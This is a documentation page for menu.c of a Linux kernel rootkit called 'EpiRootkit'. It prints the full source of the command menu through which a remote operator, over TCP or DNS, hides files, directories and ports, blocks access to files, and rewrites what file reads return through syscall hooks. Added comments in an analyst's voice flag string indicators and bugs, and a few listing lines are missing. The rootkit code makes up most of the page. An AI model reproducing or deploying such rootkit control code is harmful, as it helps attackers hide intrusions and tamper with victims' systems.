EpiRootkit
By STDBOOL
menu.c File Reference
#include "menu.h"
#include <linux/kernel.h>
#include <linux/slab.h>
#include <linux/string.h>
#include "alterate_api.h"
#include "epirootkit.h"
#include "forbid_api.h"
#include "hide_api.h"

Functions

static int hide_dir_handler (char *args, enum Protocol protocol)
 
static int unhide_dir_handler (char *args, enum Protocol protocol)
 
static int forbid_file_handler (char *args, enum Protocol protocol)
 
static int unforbid_file_handler (char *args, enum Protocol protocol)
 
static int list_hidden_handler (char *args, enum Protocol protocol)
 
static int list_forbidden_handler (char *args, enum Protocol protocol)
 
static int list_alterate_handler (char *args, enum Protocol protocol)
 
static int unmodify_file_handler (char *args, enum Protocol protocol)
 
static int modify_file_handler (char *args, enum Protocol protocol)
 
static int hide_port_handler (char *args, enum Protocol protocol)
 
static int unhide_port_handler (char *args, enum Protocol protocol)
 
static int list_hidden_port_handler (char *args, enum Protocol protocol)
 
static int hooks_help (char *args, enum Protocol protocol)
 
int hooks_menu_handler (char *args, enum Protocol protocol)
 

Variables

static struct command hooks_commands []
 

Function Documentation

◆ forbid_file_handler()

static int forbid_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 122 of file menu.c.

// Operator-command handler: forwards the raw argument string to forbid_file()
// and reports the result through send_to_server().
// Returns -EINVAL when args is NULL, otherwise forbid_file()'s return value.
// Analyst note: args is not validated in this function, and the reply formats
// "Forbidden: %s\n" / "Error forbidding %s: %d\n" are fixed literals, so they
// can serve as string indicators when examining the module or a memory image.
122 {
123 if (!args)
124 return -EINVAL;
125 int r = forbid_file(args);
126 if (r == SUCCESS)
127 send_to_server(protocol, "Forbidden: %s\n", args);
128 else
129 send_to_server(protocol, "Error forbidding %s: %d\n", args, r);
130 return r;
131}
#define SUCCESS
Definition config.h:5
int forbid_file(const char *path)
Definition forbid_api.c:24
int send_to_server(enum Protocol protocol, char *message,...)
Definition network.c:67

◆ hide_dir_handler()

static int hide_dir_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 100 of file menu.c.

// Operator-command handler: forwards the raw argument string to hide_file()
// and reports the result through send_to_server().
// Returns -EINVAL when args is NULL, otherwise hide_file()'s return value.
// Analyst note: the reply formats "Hidden: %s\n" / "Error hiding %s: %d\n" are
// the same literals hide_port_handler() uses, so a reply alone does not tell
// whether a path or a port was hidden.
100 {
101 if (!args)
102 return -EINVAL;
103 int r = hide_file(args);
104 if (r == SUCCESS)
105 send_to_server(protocol, "Hidden: %s\n", args);
106 else
107 send_to_server(protocol, "Error hiding %s: %d\n", args, r);
108 return r;
109}
int hide_file(const char *path)
Definition hide_api.c:25

◆ hide_port_handler()

static int hide_port_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 67 of file menu.c.

// Operator-command handler: forwards the raw argument string to hide_port()
// and reports the result through send_to_server().
// Returns -EINVAL when args is NULL, otherwise hide_port()'s return value.
// The port is passed on as text; any numeric parsing or range check happens in
// hide_port(), which is not shown on this page.
67 {
68 if (!args)
69 return -EINVAL;
70 int r = hide_port(args);
71 if (r == SUCCESS)
72 send_to_server(protocol, "Hidden: %s\n", args);
73 else
74 send_to_server(protocol, "Error hiding %s: %d\n", args, r);
75 return r;
76};
int hide_port(const char *port)
Definition hide_api.c:90

◆ hooks_help()

static int hooks_help ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 52 of file menu.c.

// Builds a text listing of every hooks_commands entry (name and description)
// in a STD_BUFFER_SIZE heap buffer, sends it with send_to_server(), frees the
// buffer and returns 0. The args parameter is not used.
// The header line "Available hooks commands:\n" is a fixed literal and a
// usable string indicator for this module.
52 {
53 int i;
// NOTE(review): the kmalloc() result is used by snprintf() below without a NULL check.
54 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
55 int off = snprintf(buf, STD_BUFFER_SIZE, "Available hooks commands:\n");
// Walk the table up to its NULL-named sentinel entry.
56 for (i = 0; hooks_commands[i].cmd_name != NULL; i++) {
57 off += snprintf(buf + off, STD_BUFFER_SIZE - off, " %-12s - %s\n",
58 hooks_commands[i].cmd_name, hooks_commands[i].cmd_desc);
// Stop once the accumulated length reaches the buffer size (output truncated).
59 if (off >= STD_BUFFER_SIZE)
60 break;
61 }
62 send_to_server(protocol, "%s", buf);
63 kfree(buf);
64 return 0;
65}
#define STD_BUFFER_SIZE
Definition config.h:68
static struct command hooks_commands[]
Definition menu.c:27
char * cmd_name
Definition epirootkit.h:27

◆ hooks_menu_handler()

int hooks_menu_handler ( char *  args,
enum Protocol  protocol 
)

Handle the top‐level hooks command.

Parameters
args: Everything after the word "hooks", i.e. "<subcmd> [<path>] [<other>...]".
protocol: The protocol used for communication (TCP or DNS).
Returns
0 on success, negative errno on failure.

Definition at line 289 of file menu.c.

// Dispatcher for the "hooks" command family: takes the first space/tab
// delimited token of args as the sub-command, looks it up in hooks_commands
// and calls the matching handler with the remainder of the string.
// Returns the handler's result, hooks_help()'s result when there is no token,
// or -EINVAL for an unknown sub-command.
289 {
// strsep() cuts the first token in place and advances args past it.
290 char *cmd = strsep(&args, " \t");
291
292 int i;
293 if (!cmd)
294 return hooks_help(NULL, protocol);
295
296 for (i = 0; hooks_commands[i].cmd_name != NULL; i++) {
// NOTE(review): only cmd_name_size bytes are compared, so this is a prefix
// match and the first matching table entry wins; a token that merely starts
// with an entry's name is dispatched to that entry. Anyone reconstructing
// operator activity from captured commands should apply the same rule.
297 if (strncmp(cmd, hooks_commands[i].cmd_name,
298 hooks_commands[i].cmd_name_size)
299 == 0) {
// An entry with a NULL handler is skipped and the scan continues.
300 if (hooks_commands[i].cmd_handler)
301 return hooks_commands[i].cmd_handler(args, protocol);
302 }
303 }
304
// The unrecognised token is echoed back inside a fixed-format reply.
305 send_to_server(protocol, "Unknown hooks cmd '%s', try 'hooks help'\n", cmd);
306 return -EINVAL;
307}
static int hooks_help(char *args, enum Protocol protocol)
Definition menu.c:52
int(* cmd_handler)(char *args, enum Protocol protocol)
Definition epirootkit.h:31

◆ list_alterate_handler()

static int list_alterate_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 166 of file menu.c.

// Asks alterate_list_get() to fill a STD_BUFFER_SIZE heap buffer and sends its
// contents to the operator, or a fixed "No alterate rules, sorry.\n" message
// when the returned length is <= 0. Always returns 0; args is not used.
166 {
// NOTE(review): the kmalloc() result is passed on without a NULL check;
// what happens on allocation failure depends on alterate_list_get() (not shown).
167 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
168 int len = alterate_list_get(buf, STD_BUFFER_SIZE);
169 if (len <= 0)
170 send_to_server(protocol, "No alterate rules, sorry.\n");
171 else
172 send_to_server(protocol, "%s", buf);
173 kfree(buf);
174 return 0;
175}
int alterate_list_get(char *buf, size_t buf_size)

◆ list_forbidden_handler()

static int list_forbidden_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 155 of file menu.c.

// Asks forbid_list_get() to fill a STD_BUFFER_SIZE heap buffer and sends its
// contents to the operator, or a fixed "No forbidden entries\n" message when
// the returned length is <= 0. Always returns 0; args is not used.
155 {
// NOTE(review): the kmalloc() result is passed on without a NULL check;
// what happens on allocation failure depends on forbid_list_get() (not shown).
156 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
157 int len = forbid_list_get(buf, STD_BUFFER_SIZE);
158 if (len <= 0)
159 send_to_server(protocol, "No forbidden entries\n");
160 else
161 send_to_server(protocol, "%s", buf);
162 kfree(buf);
163 return 0;
164}
int forbid_list_get(char *buf, size_t buf_size)
Definition forbid_api.c:106

◆ list_hidden_handler()

static int list_hidden_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 144 of file menu.c.

// Asks hide_list_get() to fill a STD_BUFFER_SIZE heap buffer and sends its
// contents to the operator, or a fixed "No hidden entries\n" message when the
// returned length is <= 0. Always returns 0; args is not used.
// Analyst note: the buffer returned here is the module's own record of what it
// conceals, which makes this list a direct inventory of hidden entries when
// the module's state can be recovered.
144 {
// NOTE(review): the kmalloc() result is passed on without a NULL check;
// what happens on allocation failure depends on hide_list_get() (not shown).
145 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
146 int len = hide_list_get(buf, STD_BUFFER_SIZE);
147 if (len <= 0)
148 send_to_server(protocol, "No hidden entries\n");
149 else
150 send_to_server(protocol, "%s", buf);
151 kfree(buf);
152 return 0;
153}
int hide_list_get(char *buf, size_t buf_size)
Definition hide_api.c:70

◆ list_hidden_port_handler()

static int list_hidden_port_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 89 of file menu.c.

// Asks port_list_get() to fill a STD_BUFFER_SIZE heap buffer and sends its
// contents to the operator, or a fixed "No hidden entries" message when the
// returned length is <= 0. args is not used.
// NOTE(review): unlike list_hidden_handler() on this page, this variant
// returns len rather than 0 and its empty-list message has no trailing newline.
89 {
// NOTE(review): the kmalloc() result is passed on without a NULL check;
// what happens on allocation failure depends on port_list_get() (not shown).
90 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
91 int len = port_list_get(buf, STD_BUFFER_SIZE);
92 if (len <= 0)
93 send_to_server(protocol, "No hidden entries");
94 else
95 send_to_server(protocol, "%s", buf);
96 kfree(buf);
97 return len;
98};
int port_list_get(char *buf, size_t buf_size)
Definition hide_api.c:122

◆ modify_file_handler()

static int modify_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 177 of file menu.c.

// Parses "<path> [hide_line=N] [hide_substr=TXT] [replace=SRC:DST]" from args
// and registers the resulting rule with alterate_add().
// - path is the first space-delimited token and must begin with '/'.
// - Tokens are split on single spaces, so TXT, SRC and DST cannot contain one.
// - Any unrecognised token aborts with the usage message and -EINVAL.
// Returns 0 when alterate_add() returns >= 0, otherwise the negative error
// (-EINVAL for bad syntax, -ENOMEM when kstrdup() fails).
// Analyst note: the command table on this page describes this feature as a
// "read hook", so a rule added here presumably changes what readers of `path`
// see on the live host; compare against an offline read of the disk - confirm
// against alterate_api (not shown).
177 {
178 char *path;
179 int ret = 0;
180 long hide_line = -1;
181 char *hide_substr = NULL;
182 char *replace_src = NULL;
183 char *replace_dst = NULL;
184
185 // Parsing
186 char *token;
187
188 // Get the first token
189 path = strsep(&args, " ");
190 if (!path || path[0] != '/') {
191 send_to_server(protocol, "Usage: hooks modify /full/path [hide_line=N] "
192 "[hide_substr=TXT] [replace=SRC:DST]\n");
193 return -EINVAL;
194 }
195
196 while (args && *args) {
197 token = strsep(&args, " ");
// Empty tokens come from consecutive spaces and are skipped.
198 if (!token || *token == '\0')
199 continue;
200
201 if (strncmp(token, "hide_line=", 10) == 0) {
202 char *num = token + 10;
203
// NOTE(review): no end-pointer or range check on the number; the long is
// later passed to alterate_add(), whose listed prototype takes int hide_line.
204 if (*num != '\0')
205 hide_line = simple_strtol(num, NULL, 10);
206 }
207
208 else if (strncmp(token, "hide_substr=", 12) == 0) {
209 char *txt = token + 12;
210 if (*txt == '\0') {
211 send_to_server(protocol, "Usage: hide_substr=TXT (TXT empty)\n");
212 ret = -EINVAL;
213 goto cleanup;
214 }
// NOTE(review): a repeated hide_substr= token overwrites this pointer
// without freeing the earlier copy.
215 hide_substr = kstrdup(txt, GFP_KERNEL);
216 if (!hide_substr) {
217 ret = -ENOMEM;
218 goto cleanup;
219 }
220 }
221
222 else if (strncmp(token, "replace=", 8) == 0) {
223 char *arg = token + 8;
// SRC and DST are separated at the first ':' in the token.
224 char *colon = strchr(arg, ':');
225
226 if (!colon || colon == arg || *(colon + 1) == '\0') {
// NOTE(review): listing line 227 is absent from this rendering (gutter jumps
// 226 -> 228); presumably the opening of a send_to_server( call - confirm
// against the source file.
228 protocol,
229 "Usage: replace=SRC:DST (SRC and/or DST empty, without spaces)\n");
230 ret = -EINVAL;
231 goto cleanup;
232 }
233
// Terminate SRC in place and step to the start of DST.
234 *colon = '\0';
235 colon++;
236
237 replace_src = kstrdup(arg, GFP_KERNEL);
238 if (!replace_src) {
239 ret = -ENOMEM;
240 goto cleanup;
241 }
242
243 replace_dst = kstrdup(colon, GFP_KERNEL);
244 if (!replace_dst) {
245 ret = -ENOMEM;
246 goto cleanup;
247 }
248 }
249 else {
250 send_to_server(protocol, "Usage: hooks modify /full/path [hide_line=N] "
251 "[hide_substr=TXT] [replace=SRC:DST]\n");
252 ret = -EINVAL;
253 goto cleanup;
254 }
255 }
256
257 // DEBUG
258 DBG_MSG("modify_file_handler: path='%s', hide_line=%ld, hide_substr='%s', "
259 "replace_src='%s', replace_dst='%s'\n",
260 path, hide_line, hide_substr ? hide_substr : "NULL",
261 replace_src ? replace_src : "NULL",
262 replace_dst ? replace_dst : "NULL");
263
264 ret = alterate_add(path, hide_line, hide_substr, replace_src, replace_dst);
265 if (ret >= 0)
266 send_to_server(protocol, "Modified successfully: %s\n", path);
267 else
268 send_to_server(protocol, "Error modifying %s\n", path);
269
// The local copies are freed on every path, including after a successful
// alterate_add(); kfree(NULL) is a no-op for options that were not given.
270cleanup:
271 kfree(hide_substr);
272 kfree(replace_src);
273 kfree(replace_dst);
274 return ret >= 0 ? 0 : ret;
275}
int alterate_add(const char *path, int hide_line, const char *hide_substr, const char *src, const char *dst)
#define DBG_MSG(fmt, args...)
Definition config.h:15

◆ unforbid_file_handler()

static int unforbid_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 133 of file menu.c.

// Operator-command handler: forwards the raw argument string to
// unforbid_file() and reports the result through send_to_server().
// Returns -EINVAL when args is NULL, otherwise unforbid_file()'s return value.
// Reply formats are the fixed literals "Unforbidden: %s\n" and
// "Error unforbid %s: %d\n".
133 {
134 if (!args)
135 return -EINVAL;
136 int r = unforbid_file(args);
137 if (r == SUCCESS)
138 send_to_server(protocol, "Unforbidden: %s\n", args);
139 else
140 send_to_server(protocol, "Error unforbid %s: %d\n", args, r);
141 return r;
142}
int unforbid_file(const char *path)
Definition forbid_api.c:51

◆ unhide_dir_handler()

static int unhide_dir_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 111 of file menu.c.

// Operator-command handler: forwards the raw argument string to unhide_file()
// and reports the result through send_to_server().
// Returns -EINVAL when args is NULL, otherwise unhide_file()'s return value.
// The success reply "Unhidden: %s\n" is the same literal unhide_port_handler()
// uses; only the error wording ("Error unhide" here) differs.
111 {
112 if (!args)
113 return -EINVAL;
114 int r = unhide_file(args);
115 if (r == SUCCESS)
116 send_to_server(protocol, "Unhidden: %s\n", args);
117 else
118 send_to_server(protocol, "Error unhide %s: %d\n", args, r);
119 return r;
120}
int unhide_file(const char *path)
Definition hide_api.c:52

◆ unhide_port_handler()

static int unhide_port_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 78 of file menu.c.

// Operator-command handler: forwards the raw argument string to unhide_port()
// and reports the result through send_to_server().
// Returns -EINVAL when args is NULL, otherwise unhide_port()'s return value.
// The port is passed on as text; parsing happens in unhide_port() (not shown).
78 {
79 if (!args)
80 return -EINVAL;
81 int r = unhide_port(args);
82 if (r == SUCCESS)
83 send_to_server(protocol, "Unhidden: %s\n", args);
84 else
85 send_to_server(protocol, "Error unhiding %s: %d\n", args, r);
86 return r;
87};
int unhide_port(const char *port)
Definition hide_api.c:104

◆ unmodify_file_handler()

static int unmodify_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 277 of file menu.c.

// Operator-command handler: forwards the raw argument string to
// alterate_remove() and reports the result through send_to_server().
// Returns -EINVAL when args is NULL, otherwise alterate_remove()'s return value.
// Reply formats are the fixed literals "Removed: %s\n" and
// "Error while removing %s: %d\n".
277 {
278 if (!args)
279 return -EINVAL;
280 int r = alterate_remove(args);
281 if (r == SUCCESS)
282 send_to_server(protocol, "Removed: %s\n", args);
283 else
284 send_to_server(protocol, "Error while removing %s: %d\n", args, r);
285 return r;
286}
int alterate_remove(const char *path)

Variable Documentation

◆ hooks_commands

struct command hooks_commands[]
static
Initial value:
= {
// Rendering note: the "hide", "forbid" and "modify" entries are cut off before
// their handler field in this listing; the table ends with an all-NULL sentinel.
{ "hide", 4, "hide a file or directory (getdents64 hook)", 43,
{ "unhide", 6, "unhide a file or directory", 32, unhide_dir_handler },
{ "list_hide", 9, "list hidden files/directories", 34, list_hidden_handler },
{ "add_port", 8, "add port to hide", 16, hide_port_handler },
{ "remove_port", 11, "remove hidden port", 18, unhide_port_handler },
{ "list_port", 9, "list hidden ports", 17, list_hidden_port_handler },
{ "forbid", 6, "forbid open/stat on a file (openat/stat/lstat... hook)", 55,
{ "unforbid", 8, "remove forbid on a file", 30, unforbid_file_handler },
{ "list_forbid", 11, "list forbidden files", 30, list_forbidden_handler },
{ "modify", 6,
"[CAREFUL] modify a file with hide/replace operation (read hook)", 64,
{ "unmodify", 8, "unmodify a file", 30, unmodify_file_handler },
{ "list_modify", 11, "list alterate rules", 30, list_alterate_handler },
{ "help", 4, "display hooks help menu", 25, hooks_help },
{ NULL, 0, NULL, 0, NULL }
}
static int list_hidden_handler(char *args, enum Protocol protocol)
Definition menu.c:144
static int list_hidden_port_handler(char *args, enum Protocol protocol)
Definition menu.c:89
static int hide_dir_handler(char *args, enum Protocol protocol)
Definition menu.c:100
static int forbid_file_handler(char *args, enum Protocol protocol)
Definition menu.c:122
static int unforbid_file_handler(char *args, enum Protocol protocol)
Definition menu.c:133
static int unhide_port_handler(char *args, enum Protocol protocol)
Definition menu.c:78
static int list_alterate_handler(char *args, enum Protocol protocol)
Definition menu.c:166
static int modify_file_handler(char *args, enum Protocol protocol)
Definition menu.c:177
static int list_forbidden_handler(char *args, enum Protocol protocol)
Definition menu.c:155
static int unhide_dir_handler(char *args, enum Protocol protocol)
Definition menu.c:111
static int unmodify_file_handler(char *args, enum Protocol protocol)
Definition menu.c:277
static int hide_port_handler(char *args, enum Protocol protocol)
Definition menu.c:67

Definition at line 27 of file menu.c.

// Dispatch table scanned by hooks_menu_handler() and hooks_help(); the scan
// stops at the all-NULL sentinel entry.
// Visible entry layout: command name, a length (presumably cmd_name_size, the
// byte count used in the dispatcher's strncmp), description, a second length,
// handler function.
// NOTE(review): listing lines 29, 38 and 44 are absent from this rendering, so
// the handler fields of "hide", "forbid" and "modify" are not visible here.
// NOTE(review): the second length does not always equal the description's
// length (e.g. "unhide a file or directory" is 26 characters, listed as 32);
// its field name and use are not shown on this page.
// Analyst note: according to the descriptions, the features hook getdents64,
// openat/stat/lstat and read, so directory listings, open/stat results and
// file reads taken on a live affected host are the views to cross-check
// against an offline examination.
27 {
28 { "hide", 4, "hide a file or directory (getdents64 hook)", 43,
30 { "unhide", 6, "unhide a file or directory", 32, unhide_dir_handler },
31 { "list_hide", 9, "list hidden files/directories", 34, list_hidden_handler },
32
33 { "add_port", 8, "add port to hide", 16, hide_port_handler },
34 { "remove_port", 11, "remove hidden port", 18, unhide_port_handler },
35 { "list_port", 9, "list hidden ports", 17, list_hidden_port_handler },
36
37 { "forbid", 6, "forbid open/stat on a file (openat/stat/lstat... hook)", 55,
39 { "unforbid", 8, "remove forbid on a file", 30, unforbid_file_handler },
40 { "list_forbid", 11, "list forbidden files", 30, list_forbidden_handler },
41
42 { "modify", 6,
43 "[CAREFUL] modify a file with hide/replace operation (read hook)", 64,
45 { "unmodify", 8, "unmodify a file", 30, unmodify_file_handler },
46 { "list_modify", 11, "list alterate rules", 30, list_alterate_handler },
47
48 { "help", 4, "display hooks help menu", 25, hooks_help },
49 { NULL, 0, NULL, 0, NULL }
50};